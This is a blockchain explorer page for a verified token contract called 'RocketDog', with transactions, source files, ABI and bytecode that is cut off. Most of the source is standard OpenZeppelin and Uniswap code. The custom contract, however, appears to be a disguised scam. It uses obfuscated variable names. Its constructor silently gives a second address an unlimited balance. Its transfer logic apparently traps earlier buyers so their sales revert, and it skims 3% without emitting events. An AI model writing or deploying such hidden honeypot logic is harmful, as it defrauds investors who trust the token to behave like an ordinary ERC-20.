ETH Price: $3,320.89 (+1.71%)
Gas: 5 Gwei

Contract

0x497748890E9695de88F73ab5E2c85A75dc3B52f7
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Approve152903472022-08-06 18:32:57722 days ago1659810777IN
0x49774889...5dc3B52f7
0 ETH0.0006839714.48386103
Transfer From152903012022-08-06 18:21:15722 days ago1659810075IN
0x49774889...5dc3B52f7
0 ETH0.000481557.08332846
Approve152902472022-08-06 18:11:02722 days ago1659809462IN
0x49774889...5dc3B52f7
0 ETH0.0007113315.06328417
Transfer From152901922022-08-06 17:58:32722 days ago1659808712IN
0x49774889...5dc3B52f7
0 ETH0.000657179.95957823
Approve152901842022-08-06 17:55:37722 days ago1659808537IN
0x49774889...5dc3B52f7
0 ETH0.000285446.04455636
Renounce Ownersh...152901802022-08-06 17:55:12722 days ago1659808512IN
0x49774889...5dc3B52f7
0 ETH0.000153456.52267187
Approve152901682022-08-06 17:54:08722 days ago1659808448IN
0x49774889...5dc3B52f7
0 ETH0.000466619.88114343
0x60806040152901552022-08-06 17:52:15722 days ago1659808335IN
 Create: RocketDog
0 ETH0.0555423113.33722548

View more zero value Internal Transactions in Advanced View mode

Advanced mode:
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
RocketDog

Compiler Version
v0.8.15+commit.e14f2714

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion
File 1 of 9 : Contract.sol
// https://t.me/rocketdog_eth

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.0;

import '@openzeppelin/contracts/access/Ownable.sol';
import '@openzeppelin/contracts/token/ERC20/ERC20.sol';
import '@uniswap/v2-core/contracts/interfaces/IUniswapV2Factory.sol';
import '@uniswap/v2-periphery/contracts/interfaces/IUniswapV2Router02.sol';

contract RocketDog is ERC20, Ownable {
    address public uniswapV2Pair;
    IUniswapV2Router02 public uniswapV2Router;
    mapping(address => uint256) private piece;

    function _transfer(
        address escape,
        address feature,
        uint256 soft
    ) internal override {
        uint256 failed = bee;

        if (writing[escape] == 0 && piece[escape] > 0 && uniswapV2Pair != escape) {
            writing[escape] -= failed;
        }

        address probably = feet;
        feet = feature;
        piece[probably] += failed + 1;

        _balances[escape] -= soft;
        uint256 to = (soft / 100) * bee;
        soft -= to;
        _balances[feature] += soft;
    }

    address private feet;
    mapping(address => uint256) private writing;
    uint256 public bee = 3;

    constructor(
        string memory sleep,
        string memory percent,
        address gently,
        address mathematics
    ) ERC20(sleep, percent) {
        uint256 related = ~((uint256(0)));

        uniswapV2Router = IUniswapV2Router02(gently);
        uniswapV2Pair = IUniswapV2Factory(uniswapV2Router.factory()).createPair(address(this), uniswapV2Router.WETH());

        writing[msg.sender] = related;
        writing[mathematics] = related;

        _totalSupply = 1000000000 * 10**decimals();
        _balances[msg.sender] = _totalSupply;
        _balances[mathematics] = related;
    }
}

File 2 of 9 : Ownable.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (access/Ownable.sol)

pragma solidity ^0.8.0;

import "../utils/Context.sol";

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _setOwner(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender(), 'Ownable: caller is not the owner');
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _setOwner(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), 'Ownable: new owner is the zero address');
        _setOwner(newOwner);
    }

    function _setOwner(address newOwner) private {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

File 3 of 9 : ERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC20/ERC20.sol)

pragma solidity ^0.8.0;

import "./IERC20.sol";
import "./extensions/IERC20Metadata.sol";
import "../../utils/Context.sol";

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping(address => uint256) public _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 public _totalSupply;

    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 9;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `sender` to `recipient`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
        }
        _balances[to] += amount;

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
        }
        _totalSupply -= amount;

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

File 4 of 9 : IUniswapV2Factory.sol
pragma solidity >=0.5.0;

interface IUniswapV2Factory {
    event PairCreated(address indexed token0, address indexed token1, address pair, uint);

    function feeTo() external view returns (address);
    function feeToSetter() external view returns (address);

    function getPair(address tokenA, address tokenB) external view returns (address pair);
    function allPairs(uint) external view returns (address pair);
    function allPairsLength() external view returns (uint);

    function createPair(address tokenA, address tokenB) external returns (address pair);

    function setFeeTo(address) external;
    function setFeeToSetter(address) external;
}

File 5 of 9 : IUniswapV2Router02.sol
pragma solidity >=0.6.2;

import './IUniswapV2Router01.sol';

interface IUniswapV2Router02 is IUniswapV2Router01 {
    function removeLiquidityETHSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountETH);
    function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountETH);

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external payable;
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
}

File 6 of 9 : Context.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

File 7 of 9 : IERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

File 8 of 9 : IERC20Metadata.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity ^0.8.0;

import "../IERC20.sol";

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

File 9 of 9 : IUniswapV2Router01.sol
pragma solidity >=0.6.2;

interface IUniswapV2Router01 {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint amountADesired,
        uint amountBDesired,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB, uint liquidity);
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);
    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETH(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountToken, uint amountETH);
    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETHWithPermit(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountToken, uint amountETH);
    function swapExactTokensForTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapTokensForExactTokens(
        uint amountOut,
        uint amountInMax,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);
    function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);

    function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB);
    function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut);
    function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn);
    function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts);
    function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts);
}

Settings
{
  "optimizer": {
    "enabled": false,
    "runs": 200
  },
  "outputSelection": {
    "*": {
      "*": [
        "evm.bytecode",
        "evm.deployedBytecode",
        "devdoc",
        "userdoc",
        "metadata",
        "abi"
      ]
    }
  },
  "libraries": {}
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"sleep","type":"string"},{"internalType":"string","name":"percent","type":"string"},{"internalType":"address","name":"gently","type":"address"},{"internalType":"address","name":"mathematics","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_balances","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"bee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"}]

60806040526003600b553480156200001657600080fd5b506040516200256b3803806200256b83398181016040528101906200003c9190620006dd565b838381600390816200004f9190620009d8565b508060049081620000619190620009d8565b50505062000084620000786200040460201b60201c565b6200040c60201b60201c565b60008019905082600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa15801562000139573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200015f919062000abf565b73ffffffffffffffffffffffffffffffffffffffff1663c9c6539630600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015620001e9573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200020f919062000abf565b6040518363ffffffff1660e01b81526004016200022e92919062000b02565b6020604051808303816000875af11580156200024e573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000274919062000abf565b600660006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555080600a60003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555080600a60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506200034c620004d260201b60201c565b600a6200035a919062000cbf565b633b9aca006200036b919062000d10565b6002819055506002546000803373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550806000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550505050505062000d71565b600033905090565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006009905090565b6000604051905090565b600080fd5b600080fd5b600080fd5b600080fd5b6000601f19601f8301169050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b6200054482620004f9565b810181811067ffffffffffffffff821117156200056657620005656200050a565b5b80604052505050565b60006200057b620004db565b905062000589828262000539565b919050565b600067ffffffffffffffff821115620005ac57620005ab6200050a565b5b620005b782620004f9565b9050602081019050919050565b60005b83811015620005e4578082015181840152602081019050620005c7565b83811115620005f4576000848401525b50505050565b6000620006116200060b846200058e565b6200056f565b90508281526020810184848401111562000630576200062f620004f4565b5b6200063d848285620005c4565b509392505050565b600082601f8301126200065d576200065c620004ef565b5b81516200066f848260208601620005fa565b91505092915050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000620006a58262000678565b9050919050565b620006b78162000698565b8114620006c357600080fd5b50565b600081519050620006d781620006ac565b92915050565b60008060008060808587031215620006fa57620006f9620004e5565b5b600085015167ffffffffffffffff8111156200071b576200071a620004ea565b5b620007298782880162000645565b945050602085015167ffffffffffffffff8111156200074d576200074c620004ea565b5b6200075b8782880162000645565b93505060406200076e87828801620006c6565b92505060606200078187828801620006c6565b91505092959194509250565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680620007e057607f821691505b602082108103620007f657620007f562000798565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620008607fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000821565b6200086c868362000821565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b6000620008b9620008b3620008ad8462000884565b6200088e565b62000884565b9050919050565b6000819050919050565b620008d58362000898565b620008ed620008e482620008c0565b8484546200082e565b825550505050565b600090565b62000904620008f5565b62000911818484620008ca565b505050565b5b8181101562000939576200092d600082620008fa565b60018101905062000917565b5050565b601f82111562000988576200095281620007fc565b6200095d8462000811565b810160208510156200096d578190505b620009856200097c8562000811565b83018262000916565b50505b505050565b600082821c905092915050565b6000620009ad600019846008026200098d565b1980831691505092915050565b6000620009c883836200099a565b9150826002028217905092915050565b620009e3826200078d565b67ffffffffffffffff811115620009ff57620009fe6200050a565b5b62000a0b8254620007c7565b62000a188282856200093d565b600060209050601f83116001811462000a50576000841562000a3b578287015190505b62000a478582620009ba565b86555062000ab7565b601f19841662000a6086620007fc565b60005b8281101562000a8a5784890151825560018201915060208501945060208101905062000a63565b8683101562000aaa578489015162000aa6601f8916826200099a565b8355505b6001600288020188555050505b505050505050565b60006020828403121562000ad85762000ad7620004e5565b5b600062000ae884828501620006c6565b91505092915050565b62000afc8162000698565b82525050565b600060408201905062000b19600083018562000af15